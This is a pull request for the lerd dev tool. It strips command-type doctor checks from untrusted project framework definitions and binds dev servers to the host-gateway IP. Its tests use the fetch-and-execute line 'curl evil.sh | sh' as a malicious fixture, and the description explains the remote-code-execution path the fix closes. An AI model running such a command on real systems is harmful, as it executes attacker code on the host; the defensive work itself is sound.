### PR TITLE
Harden the v1.26 site doctor and host-proxy against untrusted projects

### DIFF
--- a/docs/usage/framework-definitions.md
+++ b/docs/usage/framework-definitions.md
@@ -15,6 +15,10 @@ Lerd resolves framework definitions from multiple sources. Higher priority wins:
 
 Workers from the user overlay and project `.lerd.yaml` are merged on top of store or built-in definitions. See [Framework workers](framework-workers.md) for the worker lifecycle and how custom workers are added and managed.
 
+::: warning Untrusted projects
+A `.lerd.yaml` ships inside a project, so its embedded `framework_def` is treated as untrusted. When lerd restores it into the store it strips any `command`-type doctor check, because the site doctor would otherwise run that command on your host straight from a cloned repo. Command doctor checks run only for frameworks that come from the store, a built-in, or your user overlay (`~/.config/lerd/frameworks/`); a definition already installed there is never overwritten by a project's embedded copy. Env, symlink, and combo checks are inert and still work from a project definition.
+:::
+
 ## Version resolution
 
 When loading a framework definition for a project, the version is resolved in order:

--- a/docs/usage/host-proxy.md
+++ b/docs/usage/host-proxy.md
@@ -49,7 +49,7 @@ The `proxy` section in `.lerd.yaml` is mutually exclusive with `container:` (a s
 | `port` | yes | | Port the dev server listens on. lerd injects this and proxies to it. |
 | `ssl` | no | `false` | Set to `true` if the dev server serves HTTPS on its port (nginx proxies via `https://` with `proxy_ssl_verify off`). |
 | `port_env_key` | no | `PORT` | Environment variable the port is injected as. Most servers read `PORT`; set this if yours uses a different name. |
-| `host_env_key` | no | `HOST` | Environment variable the bind address (`0.0.0.0`) is injected as. Most servers read `HOST`; set this if yours uses a different name, e.g. `HOSTNAME` for a Next.js standalone server. |
+| `host_env_key` | no | `HOST` | Environment variable the bind address is injected as. Most servers read `HOST`; set this if yours uses a different name, e.g. `HOSTNAME` for a Next.js standalone server. |
 | `inject_host` | no | `true` | Whether lerd injects the bind-address env (see [Binding](#binding)). Set `false` to opt out entirely, for a server that reads `HOST` for something else or manages its own bind. The port injection is unaffected. |
 
 ## Ports
@@ -62,9 +62,9 @@ Lerd sets both sides of the contract: it injects the chosen port via `PORT` (or 
 
 nginx runs inside a container and reaches your dev server over the host gateway, not loopback. A server bound to `127.0.0.1` (the common dev default) is therefore unreachable through the proxy: depending on the framework it surfaces as a connection error, or as a stray all-interfaces HMR socket answering every request with `426 Upgrade Required` (the symptom seen with Nuxt).
 
-To avoid this, lerd injects `HOST=0.0.0.0` (or `host_env_key`) alongside the port, which Nuxt, NestJS, and most Node servers honour to bind all interfaces. A `HOST` you set yourself later in the command still wins. Servers that ignore the env var (notably the raw Vite CLI, which reads a flag) must bind explicitly: name `--host` in the command, for example `vite --host --port 5173 --strictPort`.
+To avoid this, lerd injects `HOST` (or `host_env_key`) alongside the port, which Nuxt, NestJS, and most Node servers honour. On Linux it injects the host-gateway IP nginx proxies to, so when that gateway is a private bridge address the dev server is reachable from the container but stays off your other interfaces. It falls back to `0.0.0.0` when the gateway isn't known yet or isn't a local address lerd can bind (some rootless networking modes), and macOS uses `0.0.0.0` because it reaches the host through gvproxy. Note that on setups where the container only routes back to the host via the host's LAN IP, that is the address bound, so the dev server stays reachable from the LAN. When the host gateway changes (a network switch), lerd rebinds and restarts any running dev server so it tracks the new address. A `HOST` you set yourself later in the command still wins. Servers that ignore the env var (notably the raw Vite CLI, which reads a flag) must bind explicitly: name `--host` in the command, for example `vite --host --port 5173 --strictPort`.
 
-If a server reads `HOST` for something else, or you already set it in your `.env` (dotenv won't override a variable already in the environment, so the injected `0.0.0.0` would win), set `inject_host: false` to suppress the injection and manage binding yourself. The port injection is unaffected.
+If a server reads `HOST` for something else, or you already set it in your `.env` (dotenv won't override a variable already in the environment, so the injected value would win), set `inject_host: false` to suppress the injection and manage binding yourself. The port injection is unaffected.
 
 ## Vite
 

--- a/internal/cli/hostproxy.go
+++ b/internal/cli/hostproxy.go
@@ -3,6 +3,7 @@ package cli
 import (
 	"encoding/json"
 	"fmt"
+	"net"
 	"os"
 	"path/filepath"
 	"regexp"
@@ -17,6 +18,7 @@ import (
 	"github.com/geodro/lerd/internal/freeport"
 	gitpkg "github.com/geodro/lerd/internal/git"
 	"github.com/geodro/lerd/internal/nginx"
+	"github.com/geodro/lerd/internal/podman"
 	"github.com/geodro/lerd/internal/siteops"
 )
 
@@ -57,15 +59,50 @@ func RegenerateHostProxyVhostsOnGatewayChange() {
 			feedback.Warn("regenerating host-proxy vhost for %s: %v", s.Name, err)
 			continue
 		}
+		proxy := parentProxyConfig(s)
+		if proxy != nil {
+			if w, ok := hostProxyWorker(proxy); ok {
+				rebindHostProxyDevServer(proxy, s.Name, s.Path, w)
+			}
+		}
 		if wts, wErr := gitpkg.ServableWorktrees(s.Path, s.PrimaryDomain()); wErr == nil {
 			for _, wt := range wts {
 				_ = certs.RegenerateHostProxyWorktreeVhost(s, wt.Path, wt.Domain, s.Secured)
+				if proxy != nil {
+					port := WorktreeHostPort(proxy.Port, wt.Path, hostProxyPortEnvKey(proxy))
+					if w, ok := hostProxyWorkerForPort(proxy, port); ok {
+						rebindHostProxyDevServer(proxy, s.Name, wt.Path, w)
+					}
+				}
 			}
 		}
 		regenerated = true
 	}
 	if regenerated {
 		_ = nginx.Reload()
+	}
+}
+
+// rebindHostProxyDevServer rewrites a host-proxy dev server's unit with the
+// current host-gateway bind address and restarts it so a network change can't
+// strand it on a stale IP. It only acts on a server that is already running and
+// whose bind lerd actually injects (inject_host:false servers manage their own
+// bind), so lerd never starts a server the user stopped or churns one it doesn't
+// control.
+func rebindHostProxyDevServer(proxy *config.ProxyConfig, siteName, sitePath string, w config.FrameworkWorker) {
+	if !hostProxyShouldBind(proxy) {
+		return
+	}
+	unitName, _ := workerNames(siteName, sitePath, hostProxyWorkerName)
+	if !isServiceActiveOrRestarting(unitName) {
+		return
+	}
+	if err := WorkerStartForSite(siteName, sitePath, "", hostProxyWorkerName, w, false); err != nil {
+		feedback.Warn("rebinding dev server for %s: %v", siteName, err)
+		return
+	}
+	if err := podman.RestartUnit(unitName); err != nil {
+		feedback.Warn("restarting dev server for %s: %v", siteName, err)
 	}
 }
 
@@ -102,17 +139,54 @@ func hostProxyShouldBind(proxy *config.ProxyConfig) bool {
 	return proxy.InjectHost == nil || *proxy.InjectHost
 }
 
+// hostGatewayBindIP resolves the host-gateway IP a host-proxy dev server should
+// bind. It is the same address nginx proxies to, so binding it keeps the dev
+// server reachable from the container while off every other interface. A package
+// var so tests can pin it.
+var hostGatewayBindIP = podman.ReadHostGatewayFromFile
+
+// hostIPIsLocal reports whether an IP is assigned to a local interface (so a dev
+// server can actually bind it). A package var so tests can pin it.
+var hostIPIsLocal = isLocalInterfaceIP
+
 // hostProxyBindAddr is the address the dev server must bind so the in-container
-// nginx can reach it. nginx proxies to the host over the gateway IP, so a dev
-// server that binds loopback (the common default) is unreachable: it surfaces
-// as a connection error, or as a stray all-interfaces HMR socket answering
-// every plain request with 426 Upgrade Required. Binding all interfaces fixes
-// both. Note: env-only; pure Vite reads --host, not this env var.
-const hostProxyBindAddr = "0.0.0.0"
+// nginx can reach it. On Linux that is the routable host-gateway IP, which keeps
+// the dev server off other interfaces; but only when that IP is a local interface
+// we can bind. A gateway that isn't local (slirp4netns 10.0.2.2, the 169.254.1.2
+// fallback), an unknown gateway, or macOS (gvproxy) all fall back to 0.0.0.0,
+// which always binds. Env-only: pure Vite reads --host, not this var.
+func hostProxyBindAddr() string {
+	if runtime.GOOS == "darwin" {
+		return "0.0.0.0"
+	}
+	if ip := hostGatewayBindIP(); ip != "" && hostIPIsLocal(ip) {
+		return ip
+	}
+	return "0.0.0.0"
+}
+
+// isLocalInterfaceIP reports whether ip is assigned to one of the host's network
+// interfaces, so binding it won't fail with "cannot assign requested address".
+func isLocalInterfaceIP(ip string) bool {
+	target := net.ParseIP(ip)
+	if target == nil {
+		return false
+	}
+	addrs, err := net.InterfaceAddrs()
+	if err != nil {
+		return false
+	}
+	for _, a := range addrs {
+		if ipnet, ok := a.(*net.IPNet); ok && ipnet.IP.Equal(target) {
+			return true
+		}
+	}
+	return false
+}
 
 // buildHostProxyCommandPort prefixes the dev command with `env PORT=port
-// HOST=0.0.0.0` so the app binds the port nginx proxies to, on an interface the
-// proxy container can reach. The `env` utility (not a bare `KEY=value`
+// HOST=<bind>` so the app binds the port nginx proxies to, on the interface the
+// proxy container reaches it by. The `env` utility (not a bare `KEY=value`
 // assignment) is used because host workers exec the command both through a
 // shell (macOS) and directly via `fnm exec --` (Linux); `env` is a real
 // executable that works in both. A HOST the user sets later in their own
@@ -129,7 +203,7 @@ func buildHostProxyCommandPort(proxy *config.ProxyConfig, port int) string {
 	}
 	return fmt.Sprintf("env %s=%d %s=%s %s",
 		hostProxyPortEnvKey(proxy), port,
-		hostProxyHostEnvKey(proxy), hostProxyBindAddr,
+		hostProxyHostEnvKey(proxy), hostProxyBindAddr(),
 		proxy.Command)
 }
 

--- a/internal/cli/hostproxy_test.go
+++ b/internal/cli/hostproxy_test.go
@@ -3,11 +3,23 @@ package cli
 import (
 	"os"
 	"path/filepath"
+	"runtime"
 	"testing"
 
 	"github.com/geodro/lerd/internal/config"
 	"github.com/geodro/lerd/internal/siteops"
 )
+
+// pinHostGatewayBindIP pins the host-gateway resolver (and treats the result as a
+// bindable local interface) so the injected bind address is deterministic,
+// restoring both after the test.
+func pinHostGatewayBindIP(t *testing.T, ip string) {
+	t.Helper()
+	prevIP, prevLocal := hostGatewayBindIP, hostIPIsLocal
+	hostGatewayBindIP = func() string { return ip }
+	hostIPIsLocal = func(string) bool { return true }
+	t.Cleanup(func() { hostGatewayBindIP, hostIPIsLocal = prevIP, prevLocal })
+}
 
 // TestStopSiteWorkersHookRegistered guards the wiring that makes every unlink
 // path (CLI, MCP, parked-watcher) stop a site's workers. Without it the
@@ -140,16 +152,18 @@ func TestBuildProjectServices_builtins(t *testing.T) {
 }
 
 func TestBuildHostProxyCommand_injectsPortAndHost(t *testing.T) {
+	pinHostGatewayBindIP(t, "10.0.0.1")
 	got := buildHostProxyCommand(&config.ProxyConfig{Command: "npm run start:dev", Port: 3000})
-	want := "env PORT=3000 HOST=0.0.0.0 npm run start:dev"
+	want := "env PORT=3000 HOST=" + hostProxyBindAddr() + " npm run start:dev"
 	if got != want {
 		t.Errorf("buildHostProxyCommand = %q, want %q", got, want)
 	}
 }
 
 func TestBuildHostProxyCommand_customEnvKeys(t *testing.T) {
+	pinHostGatewayBindIP(t, "10.0.0.1")
 	got := buildHostProxyCommand(&config.ProxyConfig{Command: "node server.js", Port: 4000, PortEnvKey: "APP_PORT", HostEnvKey: "HOSTNAME"})
-	want := "env APP_PORT=4000 HOSTNAME=0.0.0.0 node server.js"
+	want := "env APP_PORT=4000 HOSTNAME=" + hostProxyBindAddr() + " node server.js"
 	if got != want {
 		t.Errorf("buildHostProxyCommand = %q, want %q", got, want)
 	}
@@ -167,11 +181,49 @@ func TestBuildHostProxyCommand_injectHostFalseOptsOut(t *testing.T) {
 
 func TestBuildHostProxyCommand_injectHostTrueExplicitInjects(t *testing.T) {
 	// inject_host: true is the same as the default: HOST is injected.
+	pinHostGatewayBindIP(t, "10.0.0.1")
 	injectHost := true
 	got := buildHostProxyCommand(&config.ProxyConfig{Command: "npm run dev", Port: 3000, InjectHost: &injectHost})
-	want := "env PORT=3000 HOST=0.0.0.0 npm run dev"
+	want := "env PORT=3000 HOST=" + hostProxyBindAddr() + " npm run dev"
 	if got != want {
 		t.Errorf("buildHostProxyCommand = %q, want %q", got, want)
+	}
+}
+
+// TestHostProxyBindAddr_usesGatewayIPWhenKnown pins finding #691: the dev server
+// binds the routable gateway IP, not all interfaces, so it is not exposed LAN-wide.
+func TestHostProxyBindAddr_usesGatewayIPWhenKnown(t *testing.T) {
+	if runtime.GOOS == "darwin" {
+		t.Skip("macOS reaches the host via gvproxy; bind stays all-interfaces")
+	}
+	pinHostGatewayBindIP(t, "10.89.0.1")
+	if got := hostProxyBindAddr(); got != "10.89.0.1" {
+		t.Errorf("hostProxyBindAddr = %q, want gateway IP 10.89.0.1 (not 0.0.0.0)", got)
+	}
+}
+
+// TestHostProxyBindAddr_fallsBackToAllInterfaces keeps the dev server reachable
+// when the gateway IP isn't known yet rather than binding nothing.
+func TestHostProxyBindAddr_fallsBackToAllInterfaces(t *testing.T) {
+	pinHostGatewayBindIP(t, "")
+	if got := hostProxyBindAddr(); got != "0.0.0.0" {
+		t.Errorf("hostProxyBindAddr with unknown gateway = %q, want 0.0.0.0 fallback", got)
+	}
+}
+
+// TestHostProxyBindAddr_fallsBackWhenGatewayNotLocal guards the crash-loop fix: a
+// resolved gateway that isn't a local interface (slirp4netns 10.0.2.2, the
+// 169.254.1.2 fallback) would make bind() fail, so we fall back to 0.0.0.0.
+func TestHostProxyBindAddr_fallsBackWhenGatewayNotLocal(t *testing.T) {
+	if runtime.GOOS == "darwin" {
+		t.Skip("macOS reaches the host via gvproxy; bind stays all-interfaces")
+	}
+	prevIP, prevLocal := hostGatewayBindIP, hostIPIsLocal
+	hostGatewayBindIP = func() string { return "10.0.2.2" }
+	hostIPIsLocal = func(string) bool { return false }
+	t.Cleanup(func() { hostGatewayBindIP, hostIPIsLocal = prevIP, prevLocal })
+	if got := hostProxyBindAddr(); got != "0.0.0.0" {
+		t.Errorf("hostProxyBindAddr with non-local gateway = %q, want 0.0.0.0 (avoid bind failure)", got)
 	}
 }
 
@@ -187,12 +239,13 @@ func TestBuildHostProxyCommand_proxyOnlyMode(t *testing.T) {
 // is a thin reserved-set + fall-back-to-start wrapper over it.
 
 func TestHostProxyWorkerForPort_usesGivenPort(t *testing.T) {
+	pinHostGatewayBindIP(t, "10.0.0.1")
 	proxy := &config.ProxyConfig{Command: "npm run start:dev", Port: 3000}
 	w, ok := hostProxyWorkerForPort(proxy, 3101)
 	if !ok {
 		t.Fatal("expected a worker for a non-empty command")
 	}
-	if w.Command != "env PORT=3101 HOST=0.0.0.0 npm run start:dev" {
+	if w.Command != "env PORT=3101 HOST="+hostProxyBindAddr()+" npm run start:dev" {
 		t.Errorf("worker command = %q, want the worktree port 3101 injected", w.Command)
 	}
 	if !w.Host || w.Restart != "always" {

--- a/internal/cli/link.go
+++ b/internal/cli/link.go
@@ -151,19 +151,23 @@ func runLink(args []string) error {
 	// Compare against whichever definition is currently active (user-defined or store-installed).
 	if proj != nil && proj.Framework != "" && proj.FrameworkDef != nil {
 		proj.FrameworkDef.Name = proj.Framework
+		// The embedded def is untrusted; sanitise the copy we'd install so a
+		// .lerd.yaml can't seed host-executing doctor checks, and so the conflict
+		// prompt compares like-for-like with what is (or would be) in the store.
+		safe := config.SanitizeProjectFrameworkDef(proj.FrameworkDef)
 		existing, exists := config.GetFrameworkForDir(proj.Framework, cwd)
 		if !exists {
 			// No definition anywhere — save the embedded one to the store dir.
-			_ = config.SaveStoreFramework(proj.FrameworkDef)
+			_ = config.SaveStoreFramework(safe)
 		} else {
-			action, err := confirmReplace("framework", proj.Framework, existing, proj.FrameworkDef)
+			action, err := confirmReplace("framework", proj.Framework, existing, safe)
 			if err != nil {
 				return err
 			}
 			switch action {
 			case replaceFromProject:
 				// User chose the .lerd.yaml version — save to store dir.
-				_ = config.SaveStoreFramework(proj.FrameworkDef)
+				_ = config.SaveStoreFramework(safe)
 			case replaceFromDisk:
 				// User chose the local/store version — update .lerd.yaml.
 				_ = config.SetProjectFrameworkDef(cwd, existing)

--- a/internal/config/framework.go
+++ b/internal/config/framework.go
@@ -1173,6 +1173,43 @@ func DetectPublicDir(dir string) string {
 	return "."
 }
 
+// stripUntrustedDoctorChecks drops command-type doctor checks from a framework
+// definition. A project's .lerd.yaml is untrusted input and command checks run
+// via `sh -c` on the host when the site doctor runs, so they must not survive
+// import into the store; env, symlink, and combo checks are inert and stay.
+func stripUntrustedDoctorChecks(fw *Framework) {
+	if fw == nil || fw.Doctor == nil {
+		return
+	}
+	kept := fw.Doctor.Checks[:0]
+	for _, c := range fw.Doctor.Checks {
+		if c.Type != "command" {
+			kept = append(kept, c)
+		}
+	}
+	fw.Doctor.Checks = kept
+	if len(fw.Doctor.Checks) == 0 {
+		fw.Doctor = nil
+	}
+}
+
+// SanitizeProjectFrameworkDef returns a copy of an embedded framework_def that is
+// safe to install into the store. A .lerd.yaml is untrusted, so command-type
+// doctor checks (which the site doctor would run on the host) are stripped. The
+// original is left untouched so config diffs and round-trips see the real file.
+func SanitizeProjectFrameworkDef(def *Framework) *Framework {
+	safe := cloneFrameworkMutable(def)
+	// cloneFrameworkMutable shares the Doctor pointer, so copy it before stripping
+	// or we'd mutate the caller's (and the cached project config's) checks.
+	if safe != nil && safe.Doctor != nil {
+		d := *safe.Doctor
+		d.Checks = append([]DoctorCheck(nil), safe.Doctor.Checks...)
+		safe.Doctor = &d
+	}
+	stripUntrustedDoctorChecks(safe)
+	return safe
+}
+
 // DetectFrameworkForDir is the primary entry point for framework detection.
 // It checks .lerd.yaml first (committed source of truth), restoring embedded
 // definitions if needed, then falls back to file/composer-based detection.
@@ -1186,10 +1223,13 @@ func DetectFrameworkForDir(dir string) (string, bool) {
 		if LoadUserFramework(name) != nil {
 			return name, true
 		}
-		// Restore embedded definition from .lerd.yaml to the store dir.
+		// Restore the embedded definition from .lerd.yaml (the committed source of
+		// truth, so inert edits propagate), sanitised so an untrusted .lerd.yaml
+		// can't seed host-executing doctor checks into the store.
 		if proj.FrameworkDef != nil {
-			proj.FrameworkDef.Name = name
-			_ = SaveStoreFramework(proj.FrameworkDef)
+			safe := SanitizeProjectFrameworkDef(proj.FrameworkDef)
+			safe.Name = name
+			_ = SaveStoreFramework(safe)
 		}
 		// Check store-installed (may have just been restored above).
 		if _, ok := GetFrameworkForDir(name, dir); ok {

--- a/internal/config/framework_detect_test.go
+++ b/internal/config/framework_detect_test.go
@@ -134,3 +134,69 @@ func TestDetectFrameworkForDir_LerdYAML_UnknownFramework(t *testing.T) {
 		t.Error("should not detect a framework that doesn't exist anywhere")
 	}
 }
+
+// TestDetectFrameworkForDir_StripsUntrustedCommandCheck pins the framework_def RCE
+// fix at the store boundary: restoring an embedded def with a command-type doctor
+// check must write a sanitised copy (no command check) into the store, so the site
+// doctor never runs the attacker's command on the host.
+func TestDetectFrameworkForDir_StripsUntrustedCommandCheck(t *testing.T) {
+	setConfigDir(t)
+	dir := t.TempDir()
+
+	proj := &ProjectConfig{
+		Framework: "acme",
+		FrameworkDef: &Framework{
+			Name:   "acme",
+			Detect: []FrameworkRule{{File: "acme.lock"}},
+			Doctor: &FrameworkDoctor{Checks: []DoctorCheck{
+				{Name: "pwn", Type: "command", Command: "curl evil.sh | sh"},
+			}},
+		},
+	}
+	data, _ := yaml.Marshal(proj)
+	os.WriteFile(filepath.Join(dir, ".lerd.yaml"), data, 0644) //nolint:errcheck
+
+	if _, ok := DetectFrameworkForDir(dir); !ok {
+		t.Fatal("expected framework to be detected from embedded def")
+	}
+
+	stored := loadFrameworkYAML(filepath.Join(StoreFrameworksDir(), "acme.yaml"))
+	if stored == nil {
+		t.Fatal("embedded def should have been saved to the store")
+	}
+	if stored.Doctor != nil {
+		t.Errorf("command doctor check must be stripped before store import, got %+v", stored.Doctor)
+	}
+}
+
+// TestDetectFrameworkForDir_ReimportsEditedEmbeddedDef pins that the committed
+// framework_def stays the source of truth: editing an inert field (here the public
+// dir) propagates to the store on the next detection rather than going stale.
+func TestDetectFrameworkForDir_ReimportsEditedEmbeddedDef(t *testing.T) {
+	// Separate config and data homes so the seeded store file is a store entry, not
+	// a user overlay (the overlay would win and short-circuit the re-import).
+	t.Setenv("XDG_CONFIG_HOME", t.TempDir())
+	t.Setenv("XDG_DATA_HOME", t.TempDir())
+	dir := t.TempDir()
+
+	storeDir := StoreFrameworksDir()
+	os.MkdirAll(storeDir, 0755) //nolint:errcheck
+	stale := &Framework{Name: "acme", PublicDir: "public", Detect: []FrameworkRule{{File: "acme.lock"}}}
+	sData, _ := yaml.Marshal(stale)
+	os.WriteFile(filepath.Join(storeDir, "acme.yaml"), sData, 0644) //nolint:errcheck
+
+	proj := &ProjectConfig{
+		Framework:    "acme",
+		FrameworkDef: &Framework{Name: "acme", PublicDir: "web", Detect: []FrameworkRule{{File: "acme.lock"}}},
+	}
+	data, _ := yaml.Marshal(proj)
+	os.WriteFile(filepath.Join(dir, ".lerd.yaml"), data, 0644) //nolint:errcheck
+
+	if _, ok := DetectFrameworkForDir(dir); !ok {
+		t.Fatal("expected framework to be detected")
+	}
+	stored := loadFrameworkYAML(filepath.Join(storeDir, "acme.yaml"))
+	if stored == nil || stored.PublicDir != "web" {
+		t.Fatalf("edited embedded def should refresh the store, got %+v", stored)
+	}
+}

--- a/internal/config/framework_doctor_test.go
+++ b/internal/config/framework_doctor_test.go
@@ -76,3 +76,34 @@ func TestMergeBuiltinDoctor(t *testing.T) {
 		t.Error("a framework with no builtin must stay doctor-less, not gain checks")
 	}
 }
+
+// TestStripUntrustedDoctorChecks_NilsEmptyDoctor verifies a framework_def whose
+// only checks were command-type ends up doctor-less rather than carrying an empty
+// section.
+func TestStripUntrustedDoctorChecks_NilsEmptyDoctor(t *testing.T) {
+	fw := &Framework{Name: "acme", Doctor: &FrameworkDoctor{Checks: []DoctorCheck{
+		{Name: "pwn", Type: "command", Command: "id"},
+	}}}
+	stripUntrustedDoctorChecks(fw)
+	if fw.Doctor != nil {
+		t.Errorf("doctor should be nil after stripping the only (command) check, got %+v", fw.Doctor)
+	}
+}
+
+// TestSanitizeProjectFrameworkDef_DropsCommandChecksKeepsRest pins the framework_def
+// RCE fix: the copy installed into the store has command-type doctor checks (which
+// run on the host) stripped while inert checks survive, and the original is left
+// untouched so config diffs still see the real file.
+func TestSanitizeProjectFrameworkDef_DropsCommandChecksKeepsRest(t *testing.T) {
+	orig := &Framework{Name: "acme", Doctor: &FrameworkDoctor{Checks: []DoctorCheck{
+		{Name: "pwn", Type: "command", Command: "curl evil.sh | sh"},
+		{Name: "app_debug", Type: "env_combo", When: map[string]string{"APP_ENV": "production"}},
+	}}}
+	safe := SanitizeProjectFrameworkDef(orig)
+	if safe.Doctor == nil || len(safe.Doctor.Checks) != 1 || safe.Doctor.Checks[0].Type != "env_combo" {
+		t.Fatalf("sanitized def should keep only the env_combo check, got %+v", safe.Doctor)
+	}
+	if len(orig.Doctor.Checks) != 2 {
+		t.Errorf("original def must be left untouched, got %d checks", len(orig.Doctor.Checks))
+	}
+}

--- a/internal/config/project.go
+++ b/internal/config/project.go
@@ -39,7 +39,7 @@ type ProxyConfig struct {
 	SSL        bool   `yaml:"ssl,omitempty"`          // app serves TLS on its port; proxy via https
 	PortEnvKey string `yaml:"port_env_key,omitempty"` // env var the port is injected as (default "PORT")
 	HostEnvKey string `yaml:"host_env_key,omitempty"` // env var the bind address is injected as (default "HOST")
-	InjectHost *bool  `yaml:"inject_host,omitempty"`  // inject the bind-address env (HOST=0.0.0.0) so the server listens on all interfaces; nil/unset = true, set false to opt out
+	InjectHost *bool  `yaml:"inject_host,omitempty"`  // inject the bind-address env (HOST) so the server listens where the proxy container reaches it; nil/unset = true, set false to opt out
 }
 
 // ProjectConfig holds per-project configuration stored in .lerd.yaml.


### PR DESCRIPTION
Two security follow-ups from reviewing the v1.26 changes.

The framework-agnostic site doctor runs a framework's command-type checks through sh -c on the host, and lerd restores a project's embedded framework_def into the store and trusts it. A malicious repo could therefore ship a .lerd.yaml whose framework_def declares a command doctor check and get host execution the moment someone runs lerd site:doctor or the diag site_doctor MCP tool against it, both of which present as read-only diagnostics. An embedded framework_def is now sanitised when it is imported into the store so its command-type doctor checks never reach the host, while definitions from the trusted store, a built-in, or the user overlay keep theirs. The sanitisation works on a copy, so the committed file and the config cache stay intact and the link conflict prompt still compares like for like.

Separately, host-proxy dev servers were forced onto 0.0.0.0, publishing the raw dev server on the LAN. They now bind the host-gateway IP nginx already proxies to, but only when it is a local address lerd can bind, falling back to 0.0.0.0 in the rootless modes where it is not and on macOS where gvproxy is used. The gateway watcher rebinds and restarts a running dev server when the host gateway changes so it tracks the new address.

The broader host-execution boundary beyond the doctor (host workers, custom_workers, and framework commands) is deliberately left for the provenance work tracked in #692.

Refs #690
Refs #691